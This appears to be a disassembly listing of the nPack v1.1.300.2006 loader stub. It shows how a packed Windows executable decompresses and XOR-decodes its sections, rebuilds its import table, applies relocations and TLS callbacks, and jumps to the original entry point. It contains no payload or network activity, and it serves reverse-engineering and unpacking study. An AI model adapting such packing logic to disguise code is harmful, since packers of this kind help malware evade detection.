sub_496000 proc near ; CODE XREF: sub_49627A+61�p
; sub_49627A+84�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
mov edx, [eax+8]
test edx, edx
jnz short loc_49600E
mov edx, [eax+10h]
loc_49600E: ; CODE XREF: sub_496000+9�j
mov ecx, [esp+arg_8]
mov eax, [eax+0Ch]
push esi
mov esi, [esp+4+arg_0]
mov ecx, [ecx+esi*8+78h]
pop esi
cmp ecx, eax
jb short loc_49602D
add eax, edx
cmp ecx, eax
jnb short loc_49602D
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_49602D: ; CODE XREF: sub_496000+21�j
; sub_496000+27�j
xor eax, eax
retn
sub_496000 endp
; =============== S U B R O U T I N E =======================================
sub_496030 proc near ; CODE XREF: sub_49627A+12�p
; sub_496819+A�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
mov eax, [ecx+3Ch]
add eax, ecx
retn
sub_496030 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49603A proc near ; CODE XREF: sub_49623C+25�p
; sub_49627A+C7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov ecx, [ebp+arg_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
rep movsb
pop edi
pop esi
pop ebp
retn
sub_49603A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49604E proc near ; CODE XREF: sub_496819+59�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
xor eax, eax
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
rep stosb
pop edi
pop ebp
retn
sub_49604E endp
; =============== S U B R O U T I N E =======================================
sub_49605F proc near ; CODE XREF: sub_49627A+131�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
loc_496063: ; CODE XREF: sub_49605F+11�j
mov eax, [esp+arg_0]
mov dl, [esp+arg_8]
add eax, ecx
xor [eax], dl
dec ecx
jnz short loc_496063
retn
sub_49605F endp
; ---------------------------------------------------------------------------
db 0CCh
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_496080 proc near ; CODE XREF: sub_49623C+1C�p
; sub_49627A+11C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push eax
push ecx
call sub_496A30
add esp, 8
retn
sub_496080 endp
; ---------------------------------------------------------------------------
db 90h
dd 3 dup(90909090h)
aKernel32_dll_0 db 'KERNEL32.DLL',0 ; DATA XREF: sub_49620A+2�o
align 10h
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: sub_49620A+15�o
align 10h
aVirtualfree db 'VirtualFree',0 ; DATA XREF: sub_49620A+1D�o
aNpackV1_1_300_ db 'nPack v1.1.300.2006: Loader Error',0 ; DATA XREF: sub_4969A0+62�o
align 10h
aCouldNotLoadDy db 'Could not load dynamic link library %s.',0 ; DATA XREF: sub_4969A0+51�o
aTheProcedureEn db 'The procedure entry point %s could not be located in the dynamic '
; DATA XREF: sub_4969A0+2E�o
db 'link library %s.',0
align 4
aTheOrdinalUCou db 'The ordinal %u could not be located in the dynamic link library %'
; DATA XREF: sub_4969A0+47�o
db 's.',0
; =============== S U B R O U T I N E =======================================
public start
start proc near ; DATA XREF: start+19�o
cmp ds:dword_496E4C, 0
jnz short locret_4961BE
jmp loc_4961BF
; ---------------------------------------------------------------------------
locret_4961BE: ; CODE XREF: start+7�j
retn
; ---------------------------------------------------------------------------
loc_4961BF: ; CODE XREF: start+9�j
call sub_49620A
call sub_49623C
mov eax, offset start
sub eax, ds:dword_496E08
mov ds:dword_496E48, eax
call sub_49627A
call sub_496410
call sub_4968C5
call sub_496819
mov eax, ds:dword_496E48
mov ds:dword_496E4C, 1
add ds:off_496E00, eax
push ds:off_496E00
retn
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_49620A proc near ; CODE XREF: start:loc_4961BF�p
push esi
push edi
push offset aKernel32_dll_0 ; "KERNEL32.DLL"
call ds:dword_496C00 ; LoadLibraryA
mov esi, ds:dword_496C08
mov edi, eax
push offset aVirtualalloc ; "VirtualAlloc"
push edi
call esi ; GetProcAddress
push offset aVirtualfree ; "VirtualFree"
push edi
mov ds:dword_496E44, eax
call esi ; GetProcAddress
pop edi
mov ds:dword_496E40, eax
pop esi
retn
sub_49620A endp
; =============== S U B R O U T I N E =======================================
sub_49623C proc near ; CODE XREF: start+14�p
push esi
push edi
push 4
push 3000h
push 24h
push 0
call ds:dword_496E44 ; VirtualAlloc
mov esi, eax
mov edi, offset off_496E00
push esi
push edi
call sub_496080
push 24h
push esi
push edi
call sub_49603A
add esp, 14h
push 4000h
push 0
push esi
call ds:dword_496E40 ; VirtualFree
pop edi
pop esi
retn
sub_49623C endp
; =============== S U B R O U T I N E =======================================
sub_49627A proc near ; CODE XREF: start+29�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 0Ch
push ebx
push ebp
push esi
xor ebx, ebx
push ds:dword_496E48
mov [esp+1Ch+var_4], ebx
call sub_496030
mov ebp, eax
pop ecx
mov [esp+18h+var_8], ebx
movzx eax, word ptr [ebp+14h]
lea esi, [eax+ebp+18h]
movzx eax, word ptr [ebp+6]
dec eax
test eax, eax
jle loc_496409
push edi
loc_4962AE: ; CODE XREF: sub_49627A+188�j
cmp [esi+10h], ebx
mov [esp+1Ch+var_C], ebx
jz loc_4963F2
cmp [esi+14h], ebx
jz loc_4963F2
test byte ptr [esi+27h], 10h
jz short loc_4962D7
test ds:byte_496E1C, 1
jnz loc_4963F2
loc_4962D7: ; CODE XREF: sub_49627A+4E�j
push ebp
push esi
push 2
call sub_496000
add esp, 0Ch
test eax, eax
jz short loc_4962FB
cmp ds:dword_496E0C, ebx
jz loc_4963F2
mov [esp+1Ch+var_C], 1
loc_4962FB: ; CODE XREF: sub_49627A+6B�j
push ebp
push esi
push ebx
call sub_496000
add esp, 0Ch
test eax, eax
jnz loc_4963F2
mov edi, 3000h
push 4
push edi
push dword ptr [esi+10h]
push ebx
call ds:dword_496E44 ; VirtualAlloc
cmp [esp+18h+var_8], 0
mov ebx, eax
jz short loc_496375
mov ecx, [esi+10h]
mov eax, ds:dword_496E0C
sub ecx, eax
push ecx
mov ecx, [esi+0Ch]
add ecx, eax
add ecx, ds:dword_496E48
push ecx
push ebx
call sub_49603A
mov eax, ds:dword_496E0C
add esp, 0Ch
test eax, eax
jz short loc_49638B
push 4
push edi
push eax
push 0
call ds:dword_496E44 ; VirtualAlloc
mov ecx, [esi+0Ch]
push ds:dword_496E0C
add ecx, ds:dword_496E48
mov [esp+1Ch], eax
push ecx
push eax
jmp short loc_496383
; ---------------------------------------------------------------------------
loc_496375: ; CODE XREF: sub_49627A+AD�j
mov eax, [esi+0Ch]
push dword ptr [esi+10h]
add eax, ds:dword_496E48
push eax
push ebx
loc_496383: ; CODE XREF: sub_49627A+F9�j
call sub_49603A
add esp, 0Ch
loc_49638B: ; CODE XREF: sub_49627A+D6�j
mov edi, [esi+0Ch]
add edi, ds:dword_496E48
push edi
push ebx
call sub_496080
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4963B3
mov cl, ds:byte_496E18
push ecx
push eax
push edi
call sub_49605F
add esp, 0Ch
loc_4963B3: ; CODE XREF: sub_49627A+126�j
push 4000h
push 0
push ebx
call ds:dword_496E40 ; VirtualFree
cmp [esp+1Ch+var_C], 0
jz short loc_4963EB
cmp ds:dword_496E0C, 0
jz short loc_4963EB
push edi
push [esp+20h+var_4]
call sub_4964F3
pop ecx
pop ecx
push 4000h
push 0
push ebx
call ds:dword_496E40 ; VirtualFree
loc_4963EB: ; CODE XREF: sub_49627A+14C�j
; sub_49627A+155�j
add esi, 28h
xor ebx, ebx
jmp short loc_4963F5
; ---------------------------------------------------------------------------
loc_4963F2: ; CODE XREF: sub_49627A+3B�j
; sub_49627A+44�j ...
add esi, 28h
loc_4963F5: ; CODE XREF: sub_49627A+176�j
movzx eax, word ptr [ebp+6]
inc [esp+1Ch+var_8]
dec eax
cmp [esp+1Ch+var_8], eax
jl loc_4962AE
pop edi
loc_496409: ; CODE XREF: sub_49627A+2D�j
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_49627A endp
; =============== S U B R O U T I N E =======================================
sub_496410 proc near ; CODE XREF: start+2E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
mov eax, ds:dword_496E04
sub esp, 0Ch
push esi
xor esi, esi
cmp eax, esi
push edi
jz short loc_496461
mov ecx, ds:dword_496E48
cmp [ecx+eax+10h], esi
lea edi, [ecx+eax]
jz short loc_496461
push ebx
push ebp
loc_496431: ; CODE XREF: sub_496410+4D�j
mov ebx, [edi+0Ch]
add ebx, ds:dword_496E48
push ebx
call ds:dword_496C00 ; LoadLibraryA
cmp eax, esi
mov [esp+1Ch+var_8], eax
jnz short loc_496467
push esi
push esi
push ebx
push esi
call sub_4969A0
add esp, 10h
loc_496455: ; CODE XREF: sub_496410+71�j
add edi, 14h
xor esi, esi
cmp [edi+10h], esi
jnz short loc_496431
pop ebp
pop ebx
loc_496461: ; CODE XREF: sub_496410+E�j
; sub_496410+1D�j
pop edi
pop esi
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_496467: ; CODE XREF: sub_496410+37�j
mov ebp, [edi]
cmp ebp, esi
jnz short loc_496470
mov ebp, [edi+10h]
loc_496470: ; CODE XREF: sub_496410+5B�j
mov eax, ds:dword_496E48
mov esi, [edi+10h]
add ebp, eax
add esi, eax
loc_49647C: ; CODE XREF: sub_496410+E1�j
mov eax, [ebp+0]
test eax, eax
jz short loc_496455
test eax, 80000000h
jz short loc_4964B3
and eax, 0FFFFh
mov [esp+1Ch+var_4], eax
movzx eax, ax
push eax
push [esp+20h+var_8]
call ds:dword_496C08 ; GetProcAddress
test eax, eax
mov [esp+1Ch+var_C], eax
jnz short loc_4964E5
push [esp+1Ch+var_4]
push eax
push ebx
push 1
jmp short loc_4964DD
; ---------------------------------------------------------------------------
loc_4964B3: ; CODE XREF: sub_496410+78�j
mov ecx, ds:dword_496E48
add eax, ecx
add eax, 2
push eax
mov [esp+20h+var_4], eax
push [esp+20h+var_8]
call ds:dword_496C08 ; GetProcAddress
test eax, eax
mov [esp+1Ch+var_C], eax
jnz short loc_4964E5
push eax
push [esp+20h+var_4]
push ebx
push 2
loc_4964DD: ; CODE XREF: sub_496410+A1�j
call sub_4969A0
add esp, 10h
loc_4964E5: ; CODE XREF: sub_496410+97�j
; sub_496410+C3�j
mov eax, [esp+1Ch+var_C]
add ebp, 4
mov [esi], eax
add esi, 4
jmp short loc_49647C
sub_496410 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4964F3 proc near ; CODE XREF: sub_49627A+15C�p
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 74h
push ebx
push esi
push edi
and [ebp+var_14], 0
mov [ebp+var_20], 1
loc_496507: ; CODE XREF: sub_4964F3+258�j
and [ebp+var_8], 0
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax+0Eh]
mov ecx, [ebp+arg_0]
movzx ecx, word ptr [ecx+0Ch]
add eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, 10h
mov [ebp+var_18], eax
mov eax, [ebp+arg_4]
add eax, 10h
mov [ebp+var_10], eax
and [ebp+var_1C], 0
jmp short loc_496541
; ---------------------------------------------------------------------------
loc_49653A: ; CODE XREF: sub_4964F3+31C�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_496541: ; CODE XREF: sub_4964F3+45�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_C]
jge loc_496814
mov eax, [ebp+var_18]
mov eax, [eax+4]
shr eax, 1Fh
and eax, 1
test eax, eax
jz loc_4967FD
mov eax, [ebp+var_18]
mov eax, [eax+4]
and eax, 7FFFFFFFh
add eax, [ebp+arg_0]
mov [ebp+var_2C], eax
mov eax, [ebp+var_10]
mov eax, [eax+4]
and eax, 7FFFFFFFh
add eax, [ebp+arg_4]
mov [ebp+var_34], eax
mov eax, [ebp+var_2C]
movzx eax, word ptr [eax+0Eh]
mov ecx, [ebp+var_2C]
movzx ecx, word ptr [ecx+0Ch]
add eax, ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_2C]
add eax, 10h
mov [ebp+var_24], eax
mov eax, [ebp+var_34]
add eax, 10h
mov [ebp+var_38], eax
and [ebp+var_30], 0
jmp short loc_4965B5
; ---------------------------------------------------------------------------
loc_4965AE: ; CODE XREF: sub_4964F3+305�j
mov eax, [ebp+var_30]
inc eax
mov [ebp+var_30], eax
loc_4965B5: ; CODE XREF: sub_4964F3+B9�j
mov eax, [ebp+var_30]
cmp eax, [ebp+var_28]
jge loc_4967FD
mov eax, [ebp+var_24]
mov eax, [eax+4]
shr eax, 1Fh
and eax, 1
test eax, eax
jz loc_4967E6
mov eax, [ebp+var_24]
mov eax, [eax+4]
and eax, 7FFFFFFFh
add eax, [ebp+arg_0]
mov [ebp+var_50], eax
mov eax, [ebp+var_38]
mov eax, [eax+4]
and eax, 7FFFFFFFh
add eax, [ebp+arg_4]
mov [ebp+var_40], eax
mov eax, [ebp+var_50]
movzx eax, word ptr [eax+0Eh]
mov ecx, [ebp+var_50]
movzx ecx, word ptr [ecx+0Ch]
add eax, ecx
mov [ebp+var_3C], eax
mov eax, [ebp+var_50]
add eax, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_40]
add eax, 10h
mov [ebp+var_44], eax
and [ebp+var_48], 0
jmp short loc_496629
; ---------------------------------------------------------------------------
loc_496622: ; CODE XREF: sub_4964F3+2EE�j
mov eax, [ebp+var_48]
inc eax
mov [ebp+var_48], eax
loc_496629: ; CODE XREF: sub_4964F3+12D�j
mov eax, [ebp+var_48]
cmp eax, [ebp+var_3C]
jge loc_4967E6
mov eax, [ebp+var_4C]
mov eax, [eax+4]
and eax, 80000000h
test eax, eax
jnz loc_4967CF
mov eax, [ebp+var_4C]
mov ecx, [ebp+arg_0]
add ecx, [eax+4]
mov [ebp+var_54], ecx
mov eax, [ebp+var_44]
mov ecx, [ebp+arg_4]
add ecx, [eax+4]
mov [ebp+var_58], ecx
mov eax, [ebp+var_18]
mov eax, [eax]
mov [ebp+var_70], eax
mov eax, [ebp+var_70]
mov [ebp+var_74], eax
sub [ebp+var_74], 3
cmp [ebp+var_74], 0
jz short loc_4966A7
sub [ebp+var_74], 0Bh
cmp [ebp+var_74], 0
jz loc_496725
sub [ebp+var_74], 2
cmp [ebp+var_74], 0
jz loc_496793
sub [ebp+var_74], 8
cmp [ebp+var_74], 0
jz loc_496793
jmp loc_4967CF
; ---------------------------------------------------------------------------
loc_4966A7: ; CODE XREF: sub_4964F3+183�j
cmp [ebp+var_20], 0
jz short loc_4966B2
jmp loc_4967CF
; ---------------------------------------------------------------------------
loc_4966B2: ; CODE XREF: sub_4964F3+1B8�j
and [ebp+var_5C], 0
jmp short loc_4966BF
; ---------------------------------------------------------------------------
loc_4966B8: ; CODE XREF: sub_4964F3:loc_49671E�j
mov eax, [ebp+var_5C]
inc eax
mov [ebp+var_5C], eax
loc_4966BF: ; CODE XREF: sub_4964F3+1C3�j
mov eax, [ebp+var_14]
movzx eax, word ptr [eax+4]
cmp [ebp+var_5C], eax
jge short loc_496720
mov eax, [ebp+var_24]
movzx eax, word ptr [eax]
mov ecx, [ebp+var_5C]
imul ecx, 0Eh
mov edx, [ebp+var_14]
movzx ecx, word ptr [edx+ecx+12h]
cmp eax, ecx
jnz short loc_49671E
mov eax, [ebp+arg_4]
sub eax, ds:dword_496E48
mov ecx, [ebp+var_54]
mov ecx, [ecx]
sub ecx, eax
mov [ebp+var_60], ecx
mov eax, [ebp+var_54]
push dword ptr [eax+4]
mov eax, [ebp+var_60]
add eax, [ebp+arg_0]
push eax
mov eax, [ebp+var_58]
mov eax, [eax]
add eax, ds:dword_496E48
push eax
call sub_49603A
add esp, 0Ch
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_49671E: ; CODE XREF: sub_4964F3+1EE�j
jmp short loc_4966B8
; ---------------------------------------------------------------------------
loc_496720: ; CODE XREF: sub_4964F3+1D6�j
jmp loc_4967CF
; ---------------------------------------------------------------------------
loc_496725: ; CODE XREF: sub_4964F3+18D�j
cmp [ebp+var_20], 0
jz short loc_496750
mov eax, [ebp+arg_4]
sub eax, ds:dword_496E48
mov ecx, [ebp+var_54]
mov ecx, [ecx]
sub ecx, eax
mov [ebp+var_64], ecx
mov eax, [ebp+var_64]
add eax, [ebp+arg_0]
mov [ebp+var_14], eax
and [ebp+var_20], 0
jmp loc_496507
; ---------------------------------------------------------------------------
loc_496750: ; CODE XREF: sub_4964F3+236�j
cmp [ebp+var_4], 1
jnb short loc_496791
mov eax, [ebp+arg_4]
sub eax, ds:dword_496E48
mov ecx, [ebp+var_54]
mov ecx, [ecx]
sub ecx, eax
mov [ebp+var_68], ecx
mov eax, [ebp+var_54]
push dword ptr [eax+4]
mov eax, [ebp+var_68]
add eax, [ebp+arg_0]
push eax
mov eax, [ebp+var_58]
mov eax, [eax]
add eax, ds:dword_496E48
push eax
call sub_49603A
add esp, 0Ch
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_496791: ; CODE XREF: sub_4964F3+261�j
jmp short loc_4967CF
; ---------------------------------------------------------------------------
loc_496793: ; CODE XREF: sub_4964F3+19B�j
; sub_4964F3+1A9�j
cmp [ebp+var_20], 0
jz short loc_49679B
jmp short loc_4967CF
; ---------------------------------------------------------------------------
loc_49679B: ; CODE XREF: sub_4964F3+2A4�j
mov eax, [ebp+arg_4]
sub eax, ds:dword_496E48
mov ecx, [ebp+var_54]
mov ecx, [ecx]
sub ecx, eax
mov [ebp+var_6C], ecx
mov eax, [ebp+var_54]
push dword ptr [eax+4]
mov eax, [ebp+var_6C]
add eax, [ebp+arg_0]
push eax
mov eax, [ebp+var_58]
mov eax, [eax]
add eax, ds:dword_496E48
push eax
call sub_49603A
add esp, 0Ch
loc_4967CF: ; CODE XREF: sub_4964F3+14F�j
; sub_4964F3+1AF�j ...
mov eax, [ebp+var_4C]
add eax, 8
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
add eax, 8
mov [ebp+var_44], eax
jmp loc_496622
; ---------------------------------------------------------------------------
loc_4967E6: ; CODE XREF: sub_4964F3+DC�j
; sub_4964F3+13C�j
mov eax, [ebp+var_24]
add eax, 8
mov [ebp+var_24], eax
mov eax, [ebp+var_38]
add eax, 8
mov [ebp+var_38], eax
jmp loc_4965AE
; ---------------------------------------------------------------------------
loc_4967FD: ; CODE XREF: sub_4964F3+68�j
; sub_4964F3+C8�j
mov eax, [ebp+var_18]
add eax, 8
mov [ebp+var_18], eax
mov eax, [ebp+var_10]
add eax, 8
mov [ebp+var_10], eax
jmp loc_49653A
; ---------------------------------------------------------------------------
loc_496814: ; CODE XREF: sub_4964F3+54�j
pop edi
pop esi
pop ebx
leave
retn
sub_4964F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_496819 proc near ; CODE XREF: start+38�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ds:dword_496E48
call sub_496030
cmp dword ptr [eax+0C0h], 0
pop ecx
jz short loc_49687A
mov eax, ds:dword_496E50
mov ds:dword_496E2C, eax
mov ecx, ds:dword_496E50
mov edx, large fs:2Ch
mov ecx, [edx+ecx*4]
mov [ebp+var_4], ecx
mov ecx, ds:dword_496E28
mov eax, ds:dword_496E24
sub ecx, eax
push ecx
push eax
push [ebp+var_4]
call sub_49603A
push ds:dword_496E34
push ds:dword_496E28
call sub_49604E
add esp, 14h
loc_49687A: ; CODE XREF: sub_496819+17�j
cmp ds:dword_496E58, 0
push ebx
push esi
push edi
mov ds:dword_496E54, 1
jz short loc_4968C0
mov esi, ds:dword_496E30
mov eax, ds:dword_496E5C
mov edi, ds:dword_496E64
mov ebx, ds:dword_496E60
test esi, esi
mov [ebp+var_4], eax
jz short loc_4968C0
loc_4968AE: ; CODE XREF: sub_496819+A5�j
mov eax, [esi]
test eax, eax
jz short loc_4968C0
push edi
push ebx
push [ebp+var_4]
call eax
add esi, 4
jmp short loc_4968AE
; ---------------------------------------------------------------------------
loc_4968C0: ; CODE XREF: sub_496819+75�j
; sub_496819+93�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_496819 endp
; =============== S U B R O U T I N E =======================================
sub_4968C5 proc near ; CODE XREF: start+33�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
push edi
push ds:dword_496E48
call sub_496030
mov edx, ds:dword_496E48
mov edi, ds:dword_496E14
mov esi, edx
pop ecx
sub esi, [eax+34h]
lea ecx, [edi+edx]
jz loc_49699A
test edi, edi
jz loc_49699A
cmp dword ptr [ecx], 0
jz loc_49699A
mov edi, 0FFFh
loc_496906: ; CODE XREF: sub_4968C5+CF�j
mov eax, [ecx+4]
sub eax, 8
shr eax, 1
jz loc_49699A
test eax, eax
lea ebx, [ecx+8]
jbe short loc_49698E
mov [esp+14h+var_4], eax
loc_49691F: ; CODE XREF: sub_4968C5+C7�j
movzx eax, word ptr [ebx]
mov ebp, eax
and bp, 0F000h
cmp ebp, 3000h
jnz short loc_49693F
and eax, edi
add eax, [ecx]
add eax, edx
add [eax], esi
mov edx, ds:dword_496E48
loc_49693F: ; CODE XREF: sub_4968C5+6A�j
movzx eax, word ptr [ebx]
mov ebp, eax
and bp, 0F000h
cmp ebp, 1000h
jnz short loc_496965
and eax, edi
add eax, [ecx]
add eax, edx
mov edx, esi
shr edx, 10h
add [eax], dx
mov edx, ds:dword_496E48
loc_496965: ; CODE XREF: sub_4968C5+8A�j
movzx eax, word ptr [ebx]
mov ebp, eax
and bp, 0F000h
cmp ebp, 2000h
jnz short loc_496986
and eax, edi
add eax, [ecx]
add eax, edx
add [eax], si
mov edx, ds:dword_496E48
loc_496986: ; CODE XREF: sub_4968C5+B0�j
inc ebx
inc ebx
dec [esp+14h+var_4]
jnz short loc_49691F
loc_49698E: ; CODE XREF: sub_4968C5+54�j
add ecx, [ecx+4]
cmp dword ptr [ecx], 0
jnz loc_496906
loc_49699A: ; CODE XREF: sub_4968C5+25�j
; sub_4968C5+2D�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_4968C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4969A0 proc near ; CODE XREF: sub_496410+3D�p
; sub_496410:loc_4964DD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = word ptr 14h
push ebp
mov ebp, esp
push esi
push 4
push 3000h
push 0FFh
push 0
call ds:dword_496E44 ; VirtualAlloc
mov esi, eax
mov eax, [ebp+arg_0]
sub eax, 0
jz short loc_4969EE
dec eax
jz short loc_4969DF
dec eax
jnz short loc_496A00
push [ebp+arg_4]
push [ebp+arg_8]
push offset aTheProcedureEn ; "The procedure entry point %s could not "...
loc_4969D3: ; CODE XREF: sub_4969A0+4C�j
push esi
call ds:dword_496C10 ; wsprintfA
add esp, 10h
jmp short loc_496A00
; ---------------------------------------------------------------------------
loc_4969DF: ; CODE XREF: sub_4969A0+23�j
movzx eax, [ebp+arg_C]
push [ebp+arg_4]
push eax
push offset aTheOrdinalUCou ; "The ordinal %u could not be located in "...
jmp short loc_4969D3
; ---------------------------------------------------------------------------
loc_4969EE: ; CODE XREF: sub_4969A0+20�j
push [ebp+arg_4]
push offset aCouldNotLoadDy ; "Could not load dynamic link library %s."...
push esi
call ds:dword_496C10 ; wsprintfA
add esp, 0Ch
loc_496A00: ; CODE XREF: sub_4969A0+26�j
; sub_4969A0+3D�j
push 10h
push offset aNpackV1_1_300_ ; "nPack v1.1.300.2006: Loader Error"
push esi
push 0
call ds:dword_496C14 ; MessageBoxA
push 4000h
push 0
push esi
call ds:dword_496E40 ; VirtualFree
push 0FFFFFFFFh
call ds:dword_496C04 ; ExitProcess
pop esi
pop ebp
retn
sub_4969A0 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
sub_496A30 proc near ; CODE XREF: sub_496080+A�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00496ACF SIZE 0000000A BYTES
pusha
mov esi, [esp+20h+arg_0]
mov edi, [esp+20h+arg_4]
cld
mov dl, 80h
xor ebx, ebx
loc_496A3E: ; CODE XREF: sub_496A30+16�j
movsb
mov bl, 2
loc_496A41: ; CODE XREF: sub_496A30+3B�j
; sub_496A30+81�j
call sub_496AB3
jnb short loc_496A3E
xor ecx, ecx
call sub_496AB3
jnb short loc_496A6D
xor eax, eax
call sub_496AB3
jnb short loc_496A7D
mov bl, 2
inc ecx
mov al, 10h
loc_496A5F: ; CODE XREF: sub_496A30+36�j
call sub_496AB3
adc al, al
jnb short loc_496A5F
jnz short loc_496AA9
stosb
jmp short loc_496A41
; ---------------------------------------------------------------------------
loc_496A6D: ; CODE XREF: sub_496A30+1F�j
call sub_496ABF
sub ecx, ebx
jnz short loc_496A86
call sub_496ABD
jmp short loc_496AA5
; ---------------------------------------------------------------------------
loc_496A7D: ; CODE XREF: sub_496A30+28�j
lodsb
shr eax, 1
jz short loc_496ACF
adc ecx, ecx
jmp short loc_496AA2
; ---------------------------------------------------------------------------
loc_496A86: ; CODE XREF: sub_496A30+44�j
xchg eax, ecx
dec eax
shl eax, 8
lodsb
call sub_496ABD
cmp eax, 7D00h
jnb short loc_496AA2
cmp ah, 5
jnb short loc_496AA3
cmp eax, 7Fh
ja short loc_496AA4
loc_496AA2: ; CODE XREF: sub_496A30+54�j
; sub_496A30+66�j
inc ecx
loc_496AA3: ; CODE XREF: sub_496A30+6B�j
inc ecx
loc_496AA4: ; CODE XREF: sub_496A30+70�j
xchg eax, ebp
loc_496AA5: ; CODE XREF: sub_496A30+4B�j
mov eax, ebp
mov bl, 1
loc_496AA9: ; CODE XREF: sub_496A30+38�j
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short loc_496A41
sub_496A30 endp
; =============== S U B R O U T I N E =======================================
sub_496AB3 proc near ; CODE XREF: sub_496A30:loc_496A41�p
; sub_496A30+1A�p ...
add dl, dl
jnz short locret_496ABC
mov dl, [esi]
inc esi
adc dl, dl
locret_496ABC: ; CODE XREF: sub_496AB3+2�j
retn
sub_496AB3 endp
; =============== S U B R O U T I N E =======================================
sub_496ABD proc near ; CODE XREF: sub_496A30+46�p
; sub_496A30+5C�p
xor ecx, ecx
sub_496ABD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_496ABF proc near ; CODE XREF: sub_496A30:loc_496A6D�p
inc ecx
loc_496AC0: ; CODE XREF: sub_496ABF+D�j
call sub_496AB3
adc ecx, ecx
call sub_496AB3
jb short loc_496AC0
retn
sub_496ABF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_496A30
loc_496ACF: ; CODE XREF: sub_496A30+50�j
sub edi, [esp+20h+arg_4]
mov [esp+20h+var_4], edi
popa
retn
; END OF FUNCTION CHUNK FOR sub_496A30
; ---------------------------------------------------------------------------
align 4
dd 49h dup(0)
dword_496C00 dd 77E805D8h ; DATA XREF: sub_49620A+7�r
; sub_496410+2B�r
dword_496C04 dd 77E75CB5h ; DATA XREF: sub_4969A0+80�r
dword_496C08 dd 77E7A5FDh ; DATA XREF: sub_49620A+D�r
; sub_496410+8B�r ...
align 10h
dword_496C10 dd 77D4C96Ah ; DATA XREF: sub_4969A0+34�r
; sub_4969A0+57�r
dword_496C14 dd 77D6ADD7h ; DATA XREF: sub_4969A0+6A�r
dd 0
dd 96C58h, 2 dup(0)
dd 96CA4h, 96C00h, 96C68h, 2 dup(0)
dd 96CCCh, 96C10h, 5 dup(0)
dd 96C86h, 96C96h, 96C74h, 0
dd 96CC0h, 96CB2h, 0
dd 6547013Eh, 6F725074h, 64644163h, 73736572h, 1C20000h
dd 64616F4Ch, 7262694Ch, 41797261h, 7D0000h, 74697845h
dd 636F7250h, 737365h, 4E52454Bh, 32334C45h, 6C6C642Eh
dd 1BE0000h, 7373654Dh, 42656761h, 41786Fh, 737702ACh
dd 6E697270h, 416674h, 52455355h, 642E3233h, 6C6Ch, 4Ah dup(0)
off_496E00 dd offset sub_417ED0 ; DATA XREF: start+4C�w start+52�r ...
